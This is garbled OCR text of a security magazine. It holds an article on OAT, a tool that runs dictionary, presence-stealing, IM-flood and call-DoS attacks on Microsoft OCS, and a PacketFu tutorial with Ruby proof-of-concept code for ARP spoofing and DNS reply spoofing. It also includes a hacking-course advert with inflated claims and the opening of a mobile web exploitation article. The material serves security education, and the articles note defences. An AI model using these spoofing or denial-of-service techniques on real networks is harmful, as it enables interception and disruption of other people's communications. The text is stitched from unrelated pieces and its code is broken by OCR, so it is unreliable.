OAT has been developed to help security 
practitioners evaluate the security architecture 
of their OCS deployments and ensure that 
their mission-critical communications and 
systems are protected. 

Currently, OAT is in its second release 
phase. OAT v1.0 was released and 
presented atVoiceCon 2009 in Orlando. 
OAT has a rich feature set of Online 
Dictionary Attacks, Presence Stealing, 
Contact List Stealing, IM flood, Call Walk, 
Audio spam and basic reporting. 

Think bigger and Act smarter is what 
inspired me to move ahead. Taking this 
idea a step further, OAT v2.0 was officially 
released and presented in FRHACK 01 
with improved and added much awaited 
features like CallDoS, Targeted IM and 
Call Walk, Both NTLM and Kerberos 
authentication support over both TCP and 
TLS transport. 

OAT works with both Office 
Communication Server R1 and R2. 

Let's explore more about typica 
usage of OAT while conducting security 
assessment in various network 
deployments. Internal network (shown 
in Figure 6) is a deployment scenario 
where OCS users have unfiltered network 
connectivity to the OCS server and 
domain controller. In this typical network 
scenario, OAT allows to launch attacks like 

DOnline Dictionary Attack 2) Domain 
User Enumeration 3) Presence Stealing, 4) 
Contact List Stealing 5) Domain IM Flood 
6) Domain Call Walk 7) Call DoS. 
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External Network (shown in Figure 5) is 
a deployment scenario where OCS users 
have to connect through the Edge server This 
connection is usually overTLS and users do 
not have access to domain controller unless 
they are connected via VPN. In this typical 
network scenario, OAT allows us to launch all 
previously cited attacks like Online Dictionary 
Attack, Contact List Stealing, Presence 
Stealing, IM Flood, Call Walk, Call DoS 

The main difference between Interna 
and External Deployments usage is that 
OAT can attack all available UC users when 
used from Internal network while it gets 
limited to users from contact list when used 
from an External network. 

Figure 4 shows the OAT graphical 
user interface (GUI), the various tab pages 
are responsible for the various features 
supported by OAT. Security professiona 
can avail all tabs while using OAT from 
Internal network assessment while other 
than the Internal N/w Attacks tab, all others 
tabs can be used from external network 
assessment scenario. 

Before starting attack, the attacker should 
know at least 1 legitimate SIP URI from OCS 
deployments and some OCS server fully 
gualified domain name (FQDN). 

This information is not that hard to find. 
Any user having access to wireshark can 
get these details. OAT has a Common 
Attack Settings tab page responsible for 
most common setting reguired for all the 
UC attacks. Settings specific to the attacks 
are provide on respective attack tab page. 

Lets first configure OAT by setting up 
common attack settings tab. We all know 
how much havoc a weak password can 
cause. Weak passwords can also lead to 
compromise of the entire network. OAT is 
designed to test password strength of OCS 
users. 

A security professional can launch 
OAT and try the password strength test 
against the known SIP URI. Once the 
dictionary attack is successful, OAT opens 
up the door to simulate malicious proof of 
concept attacks against OCS users. 

This attack works because OCS does 
not have the policy of limiting registration 
attempts, and this attack can also be used 
as a Registration flood when launched 
against many users from different systems. 
As OCS server gets busy in servicing false 



registration attempts, legitimate users may 
experience a denial of service (DoS) on 
registrations. 

Once the attacker has successfully 
compromised legitimate user account, he 
is free to launch other UC attacks. 

Let's consider OAT running from 
Internal Deployment and enumerate all SIP 
users from domain controller. Just click 
on the Fetch Users button to fetch all OCS 
enabled users from active directory. Once 
an attacker has a list of all OCS enabled 
users, he can target a specific user or 
whole list as our victims for attacks. 



Figure 7. OAT Splash Screen 



Figure 8. Successful Dictionary Attack 



Lets choose IM Flood attack, with a 
Message Count of 50 and custom message 
as BOMB In Building..RUNII and launch 
attack by pressing Start Attack button. OAT 
will flood all the selected users with the IM 
message BOMB In Building...RUNH This 
message could be anything from malicious 
phishing URL to Viagra commercial. 

Some hard phones like Polycom 
reboot after such attacks. OAT ailows 
you to send custom IM messages which 
can be used for fishing attacks if proper 
security measures are not in place. Users 
might click on the malicious URLs thinking 
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OAT Home Common Attack Setthos | orfcie Dictionar y Attack | Internal Attacks | External Attacks | Cal DoS | Attack Report j OAT License | 

httD ; / / iraat. murt cf ora e.n lit / 

Sipera VIPER Lab 

Info 



Following settings wl be used for launching subsequent attacks Ike IM Flood, Calwak, Cal DoS etc. 

If you are not aware of the victin password then check "Crack Password" checkbox, LHess you know the 

password of vald user rest of the attacks can not be launched. 

Ockhg "Save Setoigs" vrl vaSdate the entered detak and wi save for further attacks once vatdated 
successful/. 

Ctck on "Change Settings" button to moctfy already exists settings, 



Comrron Settings 
Victim SIP URI 

Vlctkn Password 

OCS Server Name 

Select Auth Protocol 



r 



joes .vlperindfo, foczf 
| Auto 3 



& Crack Password 
F EfcJd Reports 



W Use US 



Sare Settings | | 



$ Copyright 5 ip S y gttm s lm. 
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OAT Home | Common Attack Settngs Online Dcttonary Attack | internal Attacks j External Attacks |; Cal DoS ] Attack Report 1 OAT License j 
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This attack wi alow you to check the password strength of the Victin by tryng to break his/her password 
using Dictionary Attack. 

Provide the vafid dictionary fife contairmg 1st of possible passwords and cJck on "Crack" buton to launch the 
attack. 



Seteet Dtctiray Ffe 

Dictionary Fife Name |C \Ai}hii^et\Dictm^ry. txt 



[ Crack 



[+ ] tttfc Crack to start attack 




Status 

[+] Starting the Dictionary Attack, please w 
[+ j Trying password: abtifyeet 
[+] Tryiig password: bi_.ghra 
E+j Trying password: viper 
E+j Trying password: sipera 
E+j Tryiig password: vipeilab 
| + j Trying password: sips*® 12# 
[+] Tryiig password: viper© 123 
[+] Tryiig password: aoVriist/ator 
E+j Trying password: password 
E+j Tryiig password; sipera_123 
E+j Trying password; s)peraQ123 

E+] Triad 11 passwords in 17.0951722 seconds 0.643456519252204 passwctrd/sBOinds 
E+j Gracefully stopped attack thread! 
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afferent attacks from internal IP network ■ Internal IM Rood and Internal cal 



HI up the respective settings by choosing the attack type and ctck on T-etch users" to fetch al the SIP 
enabled users from the inter ml domain. 

Dck on "Star t Attack" to launch the attack on selected users fetched from target domain, 



-Attack Settings 
<* IM Flood 



Message Count 

K? tj Wr Hi 

[+J Flooding sip:bLighira®viperindia.locaMith $ Messages 



C Call Walk 



lnri?fn.il MHood Mtack 



List of Fetched users 

/ ^:abrti^1perhdEa.la:al 

5^:*jLiT<^iperhrici, local 



If 



[+3 Trytig to register to steal presence reformation of target users. 

[+] Successful Registered to wictxn OCS server. 

1+] Stealing presence information of target users. 

[+ 3 spiactteQvpernria.kxal is offfine 

[+] sip:harsMpnriperincia,local is away 

[+] Attacking target user: sip:harstnC>vg»rindia,focal 

[+]Fkx>drig sipitosh$Jr*ijeri>ia-lccarwith 5 Messages 

[•} Hwang OHLWE user s*:harshe>vioerinda.local fated! 

[+] sip: arjunflJ^Derindia. local Is offme 

[+3 ap:jascfi©viperinds, local Is ofUne 

[+3 stpialocicine&viperindia.bcal is Never Logged In 

[+3 sipicxirjhraftviperindia.tocat is onthe 
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Figure 9. OATIM Flooding attack from Internal Network Tab 



it is coming from legitimate user and can 
fall prey to such attacks. 

As we have seen, the main difference in 
external network is that users do not have 
access to domain controller and hence OAT 
cannot enumerate OCS enabled users from 
outside network. However OAT can steal the 
contact list of legitimate users and launch 
targeted attacks against those users. 

Let's click on Get Contact button to 
fetch a contact list. Once the contact list is 
populated, choose the target users for a 
call walk from adjacent list. 

OAT steals presence information of 
selected target users before launching 
actual attack. As OCS does not support 
Offline IM or missed call alert, knowledge of 
target users' presence helps OAT to improve 



attack timeline and hence presence stealing 
is an important feature of OAT. 

Just click on the Start Attack button to 
launch a Call walk attack against selected 
users. CailWalk is an attack where the 



Fetching SIP Users 



attacker makes a call by walking through 
the seguence of registered users. OAT 
makes calls to all selected users one after 
other and leaves the media flow open 
unless specified with media to play, once 
target has picked up the call. 

OAT can read all wma files and insert 
its content as a media once the call is 
answered. If wma file is specified; it gets 
played on as soon as receiver picks up 
the call made by OAT. This attack can 
be used as audio SPAM of commercials 
or to annoy users. Call DoS is the new 
feature added in OAT v2.0 and produces 
dire results from both internal as well as 
external deployment scenarios. OAT floods 
target users with multiple calls which they 
can't entertain, thereby, knocking out target 
users from OCS server. 

This attack works for both hard as 
well as soft phones. The only way for 
communicator client to recover from 
this attack is to wait till OAT terminates 
established call sessions.OCS server does 
not terminate idle calls, and also does not 
keep track of ongoing call sessions for 
particular user causing this attack to work. 



[+] Found 8 users in contact list. 



Figure 11. OAT Enumerating SIP Users 
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(+] Called ONLINE user sip:jason$viperindiaJQcal with Call subject: You are firedll 
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Attack Status 

[+3 startng Cal wak attack on selected users. 
[+ j Tryiig to register to steal presence information of target users. 
[+ ] Successfully Registered to victim OCS server. 
" Steakng presence informatjori of target Leers. 
sipiarJunCiviperkntia.local is offtne 
sip :*ason{£viperincia .local Is onine 
Attacking target user: s$:Jason@v£eriricta.kncal 
Making cal to user sap:Jasonttvir^rtta.bcal 
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Figure 10. A Glance at IM Flood Attack 
Window 
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Figure 12. OAT Performs Call Walk Attack 
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It's practically impossible for a single user to 
answer 30 simultaneous calls. OCS should 
not route more than 2-3 times for any user if 
he is already in call session. 

One of the main features of any security 
assessment tool is proper report generation 
of the Report Generation feature, OAT is a 
complete security assessment tool. 

OAT generates nice reports of the 
launched attack sessions with detailed 
information like settings used for attack, 
attack details and the respective result. 
These reports are handy for security auditor 
and can be a part of penetration testing final 
report. OAT reports can be saved in different 
formats including PDF, MS-Word DOC file 
format, RTF and Text. I am still exploring and 
analyzing new areas from MS OCS server 
ike Group Chat server and A/V Server 

During my research in OCS, 
observed a minute yet significant security 
flaw in OCS Signature generation. And 
it's worth mentioning that disastrous DoS, 
presence manipulations, conference 
hijack attacks against OCS server have 
been discovered. Currently, I am in the 
process of automating these attacks and 
building the into the next version of OAT. 

Conclusion 

Since VoIP stands as another application 
over internet, there is a need to secure it 
by periodically conducting VoIP security 
assessments. There's no such thing as a 
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Figure 14. Apparent Result of CallDoS 
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The tab page shews the reports generated rArng the attack process. To generate ttie detailed report of the 
attack process, you need to check "&Jd Report*" checkbox from the "common Attack settings" tab. 

You can view reports Generated for launched attacks by selecting the respectrte ratio buttons and save them 
by pressing "Save Report" button. 
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Authentication protocd: Auto 
Transport protocol: T1S 

[+] Tried 11 pas&wcrck in 17.09375 seconds 0.64 3510C5484 4607 pas$warcV5fiCCrdS 

(+ j GracerHy *topp=d attack thread! 
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Figure 13. Co// Wo/k /ndicot/ve Message 



Figure 15. OAT: Report generation 

bulletproof VoIP implementation, but there 
are a handful of fundamental steps like use 
of TLS, SRTP and implementation of VoIP 
best practices which can be taken today 
to ensure that your system, or the systems 
that you're planning, will be highly secure. 

The objective of OAT is to help identify 
vulnerabilities in the configuration and 
deployment of Microsoft OCS 
This tool is all about improving 
security; it's not a hacking tool to 
expose vulnerabilities that can't be 
protected against 

All of the security issues uncovered by 
the tool can be mitigated by following 
Microsoft recommended security best 
practices 



Both OAT v1 .0 and OAT v2.0 can be 
downloaded freely from its official website 
- http://voatsf.net. The installation guide 
along with detailed usage examples and 
screenshots are available on official OAT 
website. 

Please feel free to review the tool 
and respond back with suggestions and 
improvements. I will try my best to implement 
the feasible ones in later releases. 
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Sipera VIPER (Voice over IP Exploit Research) Lab. He is 
a graduate from University of Pune, India and Author of 
OAT (http://voat.sf.net), Videojak (http://videojak.sf.net) and 
XTest (http://xtest.sf.net ) VoIP assessment tools. 
He has spoken in information security conferences like 
ClubHack, FRHack 01, SingCERT and can be reachable 
on Abhijeet@viperlab.net 
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Difficulty 



WHAT YOU WILL 
LEARN... 

How to craft packets in Ruby 

WHAT SHOULD YOU 
KNOW... 

Basics in programming 



Manipulating 
The Network 
with PacketFu 



PacketFu is a mid level packet manipulation library written in 
Ruby. The purpose of PacketFu was to make it easier for people 
for crafting and manipulating network packets in Ruby 



The PacketFu project was started in August 
2008 by Tod Breadsley from BreakingPoint 
Systems. The reason for this project was 
that there wasn't any easy to use packet crafting 
and manipulation library for Ruby. PacketFu was 
built on top of PcabRub library. 

PacketFu is currently included as a library 
inside Metasploit pentesting framework which 
is extremely useful if you are planning to 
code custom networking related modules in 
metasploit. 

The best way to use PacketFu is to run it in 
Ubuntu or to download a copy of Backtrack 4. The 
next thing you should do is to checkout the latest 
svn release of PacketFu (see Figure 1) 



To learn about the format about the network 
packets you can read the reguestfor comment (RFC) 
or if you are more of a practical type of person. You 
could be running wireshark side along with some 
linux commands/tools to generate the network 
packets and capture/analyze the packets in wireshark 
(that's if the protocol is supported in wireshark). 

For example, to understand what comprises 
of a dns reguest/response packet, you could 
run nslookup and capture the reguest/response 
packet with wireshark by listening passively on a 
wireless network interface (see Table 1). 

Let's look at how an ARP spoof packet looks 
like in wireshark 



ARP Spoofing with 
PacketFu 

h this exercise, we are going to learn 
to how to create address resolution 
protocol (ARP) spoofing packets and 
also create domain name services 
(DNS) spoofing packets with PacketFu. 
ARP spoofing allows you to perform 
a man in the middle (MITM) attack on 
the target. Effectively, it is sending a ARP 
packet to the target saying that the target 
that your host computer is the gateway 
instead of the rea! gateway. 



< (untitled} Mrcshwk 



B« 6* *»« S° £apture ftrulyie Smites Msphonj; loot 



st u a a « b s x 



203,311.152.66 



1 1 .l'JI mm . i i i j.ij.u , X... , , J. /. I >±i,., - , . 1 , . 7 . .j, L-'^'.. .- ' J - . -I.iIJl i ' J ' ■ Ul ' -.-X 

S user Datagram protocol, sre port: 5 boss 4l3039)» ust ports domain (535 
B Domain Name System (query) 

Response in: _£l 



m Flags: 0x0100 (standard query} 
Quest lans : 1 



Figure 2. Fields that incoming DNS responses ore checked for 



J? sun checkout http-//packetf u .go ogle code. con/sun/trunk packetf u-readonlj» 



Figure 1. Checking out the SVN source for packetf u 
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Under the Ethernet section of the ARP 
packet, you will find 3 fields (Destination, 
Source and Type). 

have specified the Destination MAC 

address tO be FF: FF: FF: FF: FF: ff 

which is the broadcast address of the 
network. That means that all computers 
in the network will receive this ARP packet. 
Change this to the MAC address to the 
target computer if you want to be more 
specific. 

The source address would be that 
of the gateway and the type would be 
0x0806 in order for it to be classified as 
an ARP packet. 

The next few sections in Address 
Resolution Protocol (ARP) is pretty 
standard with the exception of Opcode. 
You must specify a value of 0x0002 
for it to be a ARP reply instead of ARP 
reguest packet. You would create an ARP 
request packet (0x0001) if you would like 
to know the MAC address of a certain 
IP address in the network. Let's now dive 
into the coding portion of this exercise. 
The table shows the relevant attributes 
that we need to specify in PacketFu when 
defining the packet (see Table 2). 

Defending Against ARP 
Spoofing In Your Network 

It is possible to protect your users in 
the network against ARP spoofing by 
enable port security in the switch. Port 
security makes it possible to make sure 
that there is only one Mac address 
behind each port of the switch. Some 
switches do allow you to disable the 
port or/and alert you about the issue 
via simple network management 
protocol (SNMP). 

Spoof DNS Replies to Client 
Hosts with PacketFu 

In the next exercise, we will learn about 
how to write your own DNS spoofing 
script with PacketFu. 

How do you work around this port 
security feature to attack the target user? 
One method is to use DNS spoofing. 

When the target sends out a DNS 
lookup reguest to DNS server, the 
first DNS response packet received 
matching the same transaction ID and 
source port will be accepted by the 



target machine. That's basically the only 
checks that the client does. You do not 
need to spoof the sender IP address / 
ethernet address in your DNS response 
packet (see Figure 2). 



PacketFu is currently not possible to 
bind to an interface with an IP address. 
A chat with the author mentions that 
this might change in future. A current 
workaround that I am using is to use two 



Table 1. Fields of ARP Packet as shown in Wireshark 



Ethernet II 




Destination: 

Source: 
Type: 


Broadcast (f f : f f : f f : f f : f f : f f ) 
11:22:33:44:55:66 (11:22:33:44:55:66) 
ARP (0x0806) 


Address Resolution 
Protocol 




Hardware Type: 
Protocol Type: 
Hardware Size: 
Protocol Size: 
Opcode: 

Sender MAC Address: 
Sender IP Address: 
Target MAC Address: 
Target IP Address: 


Ethernet (0x0001) 

IP (0x0800) 

6 

4 

Reply (0x0002) 

11:22:33:44:55:66 (11:22:33:44:55:66) 

10.7.3.1 (10.7.3.1) 

Broadcast (FF: FF: FF : FF: FF: FF) 

0.0.0.0 



Table 2. Matching of between ARP packet fields and attributes in PacketFu 



Packet Structure as shown in Wireshark 


Attributes as used 
in PacketFu 


Destination: Broadcast (FF:FF:FF:FF:FF:FF) 
Source: 11:22:33:44:55:66 

Type: ARP (0x0806) 


eth_daddr 
eth_saddr 


Hardware Type: Ethernet (0x0001) 
Protocol Type: IP (0x0800) 
Hardware Size: 6 
Protocol Size: 4 
Opcode: Reply (0x0002) 

Sender MAC Address: 11:22:33:44:55:66 (11:22:33:44:55:66) 
Sender IP Address: 10.7.3.1 (10.7.3.1) 
Target MAC Address: Broadcast (FF:FF:FF:FF:FF:FF) 
Target IP Address: 0.0.0.0 


arp opcode 
arp saddr mac 
arp saddr ip 
arp daddr mac 
arp daddr ip 



Table 3. Source code for ARP Spoofing 



Line 


Code 


1 


# ! /usr/bin/env 


ruby 


2 


require 'packetfu' 


3 


$ipcfg = PacketFu: :Utils.whoami? ( : if ace=> 'ethO ' ) 


4 


puts 


"ARP spoofing the network..." 


5 


arp 


pkt = PacketFu :: ARPPacket . new (: flavor => "Windows") 


6 


arp 


pkt.eth _ 


saddr = "00:00:00:00:00:00" 


7 


arp 


pkt.eth _ 


daddr = "FF: FF: FF: FF: FF: FF" 


8 


arp 


pkt. arp 


saddr mac = $ipcfg[:eth saddr] 


9 


arp 


pkt. arp 


daddr mac = "FF: FF: FF:FF:FF" 


10 


arp 


pkt. arp 


saddr ip = '192.168.1.1' 


11 


arp 


pkt. arp 


daddr _ ip = "0.0.0.0" 


12 


arp 


pkt. arp 


opcode = 2 


13 


caught=false 




14 


while 


caught== 


: false do 


15 


arp pkt.to w('ethO') 


16 


end 
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Figure 3. POC Source code for Client DNS Spoofing 
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Figure 4. The poylood in DNS query packet 



B Domain Name system (query) 

fpesporse in : 2 I . 

Transaction ID: 0x9777 < ] 
m Flags: 0x0100 (standard query) 

Questions: 1 

Answer rrs: 0 

Authority RRs: 0 

Additional RRS : 0 
B Queries 

*' v/ahnn rnm' r\/n*a A el j?? TN 

uu'ju m — — — w — m — m — to — n jn — ro — n — n — mj — — T-r — rrmrm — . . I . . . I- » 

62 70 Qa 07 05 5f cb d3 . 7d bp. . ._. . 

01 00 00 01 .B. ..5.# - 

61 68 6f6f 03 63 6f 6d y ahoo.cotti 



■^O — m CTT — TO CT TO — XT" 

0010 00 37 64 ca 00 00 80 11 

0020 98 42 f?6 b2 00 3 5 00 23 

0030 00 00 00 00 00 00 05 79 

0040 00 00 01 00 01 



Figure 5. The transaction ID of DNS query packet In hexadecimal 



wireless network cards. One in monitor 
mode and another in managed mode. 
The traffic is redirected from the monitor 
interface mono to ato using Airtun-ng. An 
IP address is set on ato interface. The 
script is then bind to the ato interface to 
capture packets. 

There are two functions which I will 
explain in the POC code shown below. 

The first function sniff DNSPacket o 

will parse each packet sniffed at the 
network interface. 

The second function 
generateSpoofPacketO Will be called 
when it detects a DNS reguest packet. 

Parsing Packets with 
PacketFu 

Let's look at how to perform packet 
parsing in PacketFu. 

The below code specifies the network 
interface to listen to. For the current version 
of PacketFu, the network interface must 
be bind to an IP address. If not, it will not 
work. We have specified the options below 
to start the capture process and to save 
the packets captured at the interface (see 
Figure 3). 

A filter is set to only capture packets 
that match the criteria udp and port 53. 
If you have used wireshark before, this 
capture filter should be familiar to you. 

pkt_array = PacketFu:: 

Capture . new (: if ace => 'wlanO', 
: start => true, :filter => 
'udp and port 53', :save=>true) 

Next, we iterate through each packets 
in the network packet stream captured 
at the interface. It checks to see if the 
packet is empty. If the packet is not 
empty, we convert the character string 
representation of the packet back into a 
PacketFu packet. 

caught = false 

while caught==f alse do 

pkt_array. stream. each do |p| 

if PacketFu: : Packet. has_data? 
pkt = PacketFu: : 

Packet. parse (p) 

As shown in the below wireshark 
screenshot. We have identified the data 
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portion (payload) of the DNS query. The 
data portion is also known as the payload 
in PacketFu (see Figure 4). 

h the below screen, I have highlighted 
the transaction ID, the information is 
stored in the first 2 bytes of the payload. In 
order to identify if it's a DNS query, the next 
variable would contain the information we 
need, \x0i\x00 (see Figure 5). 

h the below code, we extract the 3rd 
and 4th byte of the payload. Since the 
bytes are represented in hexadecima 
values, we need to change it to base=i6. 

$dnsCount = pkt .payload [2 ]. to_s (base 
=16) +pkt.payload[3] . to_ 
s (base=16) 

'10' 



Table 4. Explains the source code listed in table 3 



$domainName=" 
if $dnsCount= 



The domain name queries starts at 13 
byte of the payload. The13th byte specifies 
the length of the domain name before 
the dot com. The dot in front of the com 
is represented by a \x03. The end of the 
domain name string is terminated by a 
\x00. 

The next 2 bytes refers to the type of 
the query. You can use the below table for 
reference. You will need to convert it to hex 
values (Table 4). 

From the below code, the script reads 
each byte of the payload from the 13 byte 
until it hits a \x00 which it terminates. We 
convert the hex value of the domain name 
back into ASCII characters using the 
.hex.chr function (see Figure 8). 

h the below code, we check to see 
if the next 2 bytes in the payload after 
the terminator \x00 of the domain name 
contains a value of 1. If it does, we call 

OUr function generateDNSResponse () to 

send out a spoof DNS packet (see Figure 
9, 10). 

Generating Spoofed DNS 
Response 

Next, we will move on to 

generateDNSResponse () function. 

If you are converting a character 
stream to binary, you will need to use the 
pack(c*) function. The c word represents 
a character and * means convert 
everything in the array from character to 
binary. 



Line 2 


Imports the packetfu library. 


Line 3 


PacketFu: : Utils : whoami? (iface = >'ethO' ) is a Useful function Which 

allows you to get information about your network interface (e.g. MAC/IP 
address) 

All information about the network interface is stored in the hash $ipcfg[] 


Line 5 


Defines an ARP packet with "windows" flavor. You can replace it with "linux" 
too 


Line 8 


Source Ethernet Mac Address 

(If you want to spoof it as packets send from the gateway. Change it to the 

ivimo uuuieso O! liiuloi Li it? guLevvuyy 

Extract the host MAC address information from the hash SipcfgO 

Other hash values that can be accessible from $ipcfg [] are :eth ere, : 

ip saddr, :ip sre, :eth dst and eth daddr 


Line 9 


Destination MAC Address 

(Enter the MAC address of the target computer. Enter ff:ff:ff: ff: ff: ff if 
you want to target any computers in the network) 


Line 10 


ARP Packet Source IP Address 


Line 11 


ARP Packet Destination IP Address 


Line 12 


Specifies the Opcode of the ARP packet. 
Opcode of 1 means ARP Request. 
Opcode of 2 means ARP Response 


Line 15 


Using an infinite loop, arp spoof packets are sent to the ethO interface 



Table 5. Table showing the list of DNS lookups 



Type 


Value 


Description 


A 


1 


IP Address 


NS 


2 


Name Server 


CNAME 


5 


Alias of a domain name 


PTR 


H| 


Reverse DNS Lookup using the IP Address 


HINFO 


13 


Host Information 






MX Record 


AXFR 


252 


Request for Zone Transfer 


ANY 


255 


Request for All Records 



0010 00 37 64 ca 00 00 SO 11 62 70 0a 07 05 5f cb d3 . 7d. 

0020 58 42 66 b2 00 3J 00 23 Cl aa 97 77 01 00 00 01 . B. 

0030 00 00 00 00 
004 0 



00 00 01 00 01 



Figure 6. The domain name queried in DNS lookup as shown In the payload 



... bp 

5.# . ■ . W 



Queries 

B yahoo.com: type A, class in 
Name: yahoo, com 



Type: A (Host address) 



class: in (0x0001) 



0010 00 37 64 ca 00 00 80 11 

0020 98 42 e6 b2 00 35 00 23 

0030 00 00 OQ 00 00 00 05 79 

0040 00 EEMjH 00 01 



62 70 Oa 07 05 Sf cb d3 . 7d bp..._. . 

cl aa 97 77 01 00 00 01 ,8...5.# ...w 

61 68 6f 6f 03 63 6f 6d y ahoo.com 



Figure 7. The type of DNS lookup. Type A refers to IP Address 
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Further Resources 

PacketFu Google Code Site: http: 

//code.googie.com/p/packetfu/ 

Tod Breadsley's Blog: http://www.planb- 

security.net/ 

Backtrack 4 download link: http: 

//www.remote-exp!oit.org/backtrack_ 

download.html 

Metasploit Framework: http:// 
www.metasploit.com/ 



if 5dnsCount==*10 * 






g=l 3 






while g<10 0 








if pkt. payload [g] . "bo s(base~16) 


.hex.chc— "\0 03 " 






SdomainlIaine+= " . " 








elsif pkt, payload [g] . to s(base= 


16) . hex. chr™"\000 " 






break 








else 








$domainlIame+=pkt. payload [g] 


.to s(base=l>S) . hex. chr 




end 






g+-i 






end 





Figure 8. Code checks to see if its a DNS query packet and extracts domain name 
queried 



#Inject Packet if DNS A Record Lookup 
if pkt. payload [g+ -] . to_s Ctoase"le)"~"l " 

transIDl = pkt. payload [ ] . to^s(base=16) 

transID2 ■ pkt. payload [ ] . to^s(ha8i" J 

generateDNSResponseCSdomainHarae , transIDl , tiransIDZ , pkt. eth_saddc . to_s , pkt. etlr 

end 

Figure 9. Code that parse the DNS query packet and injects response if DNS query 
type is A 



3 Queries 

- yahoo. com: type A, class in 
Name: yahoo.com 
Type: A (Host address} 
class: in (0x0001) 

I - J V3 ^3 TT UU UU — W 



0010 00 37 bO 20 00 00 80 11 

0020 02 42 d7 06 00 35 00 23 

0030 00 00 00 00 00 00 05 79 

0040 00 



7U — r-O — n? — r=T} — TO — m — T"? 

a6 2c 0a 07 05 5f d2 cl 
50 01 a7 df 01 00 00 01 
61 68 6f 6f 03 63 6f 6d 



P 

.y ahoo. com 



Figure 10. Type of DNS query is expressed in this portion of the payload 

def u'enci'atcDllSKeaip(jnsc(doiiHiiiiNanre, transIDl ,trana ID 2 , ech. aaddr , ip aaddr , udp_dst) 
oomainHaKWL = donalnNane, split! "- "> 

domainHame2 - doiHinHa]Hl[ ]4"\ h03 r '+domalQName 1 [ !]-t.'*\ xflo" 
flomainHatneLen - doroftlnNajoelc l.ltnfith 
dGtrainHameLcn - [e5oinainNaroei.en] .patk( ' c*' > 

youxIPAddresal - SyourlPAddrcss.spllttf ' . ' i 

y ouf I p jtddres 3Hex - ( your TPAddr ess L I 3 . to_ 1 j your I PAddreas 1 1 1 . ro_ l , your I PAddreaa 1 1 ] ] . pac k ( ' 1 
yourXPAddreasHeK-t-.. [ your IPAddress 1 [ 3 ] .to_i] .pack< 'c»' ) 

transit*- transXDl,hex.chr-t-tcanaID2 .hex. chr 
wdp_pfct - PwcJwtFv! : UDPPacKet - new 
udp_pkt . eth_saddt - Sipcf if [ : eth_saddr] 
udp_pjtc , ecft_dadac - eth_safldr 
udp_p]tt . udp_sro" "S3" 
udp_pxt . udp_dst» udp_src . to 1 
udp_pxt . ip_saddr= $lBC£tr[: ip_saddr] 
udp_pkt . ip_daddr- ip aaddr 

udp_plcc , pay load" ti ana 1 D+ "\ xs i\ xS0"+"\ xoo\ xq 1 "+ M 'i x 0 0\ x 0 J "+ " \ x 00\ x 00 "+ "\ x 00\ xoe "+do»a LnNatneLeKH-dotnal manes 
udp_pxc , pay load*-- ,l \xQO^x01' , +"\xo^^\x01"+ ,^ ^xc□^xac^xt^□^x01\xoo^x01\x□o\xOD\xl^\x^^^xo□^xo^"+you^IPAadce3^Ilex 
udp pkt.recalc 
udp_pxc , tc_v( 1 vlacO' > 



Figure 11. xxxxxxxx 



ED Domain Name System (query) 
[Response In: 21 
Transaction id: 0x9777 



Figure 12. The transaction 



h the early part of the script, 
$youriPAddress is replaced with the fake 
IP address of the domain you want the 
client to be directed to. 

The function .recaic recalculates all 
fields for all headers in the packet and 
generates the packet. 

The function .to _ w writes to packet 
to the interface wiano in this example (see 
Figure 11). 

For the transaction ID, it is represented 
in 2 bytes of hexadecimal values (e.g. 
oiff). In order to write the values \xOi\ 
xff directly inside the payload of the DNS 
response, you need to parse the values 
thru the function .hex. chr. 

That is basically how the POC script 
works. 

Defending Against Client 
DNS Spoofing Attack 

So how do you defend against this type of 
client DNS spoofing attack? DNS security 
(DNSSEC) adds origin authentication and 
integrity. This makes it possible for client to 
verify DNS responses. 

DNSSEC is currently supported 
in Windows Server 2008 R2 (Server 
and Client) and Windows 7 (Client). For 
more information on using DNSSEC in 
Windows environment, check out http: 
//technet.microsoft.com/en-us/library/ee6 
49277%28WS.10%29.aspx. 

It is indeed very easy to get started 
with PacketFu. Give it a try and you won't 
regret it by its ease of use. 



Keith Lee 

You can reach me by the below means: 
Email: keith.lee2012[at]gmail.com 
Twitter: @keith55 

Blog: http://milo2012.wordpress.com 
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Want to be the Best ETHICAL 

HACKER 

& Security Expert? 







The Secret of Hacking :: 2nd Edition 

After the grand success of the first edition that came out in June 2009 
Leo Impact has come back with a 4 times more powerful second edition. 



Ethical Hacker 

Average Salary 

70,000 USD 
/anum 

Source: payscale.com 



Even the most secure computers are Hackable... 

■ All E-mail addresses are Hackable, including Gmail, Yahoo!, Rediff etc. 

■ All PCs can be hacked remotely using the latest tools and exploits. 

■ All computer passwords are hackable (windows, linux,sun Solaris, mac os) 

■ Easily pass CEH (ver 6}, CHFI, CISSP, CISA Certification. 

■ Learn how to secure your system and network from hackers. 



Learn Advanced Ethical Hacking: 

Metasploit & Backtrack & Untraceable Hacking 

Advanced Pentration Testing & Vulnerability 
assesement. 



The Secret of Hacking" Kit Include's : 

.1 Printed Book {Second Edition ) + First Edition (PDF) 

• 2 DVD (1 8,500 tools, e-books, videos) 

• E-mail Technical Support 

• Free Lifetime Membership to Access Videos & Tools 




Payment modes: 
Credit Card, Paypal, Wire Transfer... 



For more info. & online order: WWW. thesecretofhacking.com 
Order by phone: + 1 -8 1 8-25 2-9090, +9 1 .98299445 1 8 




Leo Impact 

Security 



LEO IMPACT SECURITY SERVICES PVT LTD 

Corporate Office: 
2029 Century Park East,14th Floor, 
California 90067 United States 
Email: contact@leoimpact.com 



INDIA : 

T8, Malyia apartment, near BJP office 
c-schme, jaipur (Rajasthan) 302001 



MAURO GENTILE 



Difficulty 



WHAT YOU WILL 
LEARN... 

What mobile web means, 

How to structure a site 
accessible from mobile devices, 

How to use a phone as a tool 
for hacking. 

WHAT SHOULD YOU 
KNOW... 

PHP and Javascript 
programming languages, 

Client - server communication 
protocol. 



Mobile Web: 
Privacy Keeping 
and Exploitation 
Methods 



Modern technology has produced a rapid spread of so-called 
mobile devices (i.e. mobile phones and handhelds) with which the 
use of the Internet and its services has become very easy and 
affordable. 



Nevertheless, the approach to hacking 
begins to depart slightly from the classic 
approach that reguires a computer or 
a laptop with which to connect to the network, 
because several attack scenarios can be made 
from your phone. 

Introduction 

Inevitably, most of the readers will think that the 
purpose of this article is to present arguments 
regarding vulnerabilities related to the protocols 
for Bluetooth, or even how to intercept telephone 
calls. In fact, this article takes an entirely different 
approach. The main objective is to highlight 
the opportunity to use our phone as a termina 
to connect to the network and find possible 
vulnerabilities of Web applications by putting 
in place some mini attacks wherever we are. 
Of course, as it is expressed here may be very 
trivial and unnecessary for some hackers. It 
appears paradoxical and probably foolish to 
attempt hacking from a phone, but in any case 
why not try? 

The testing of all that will be explained has 
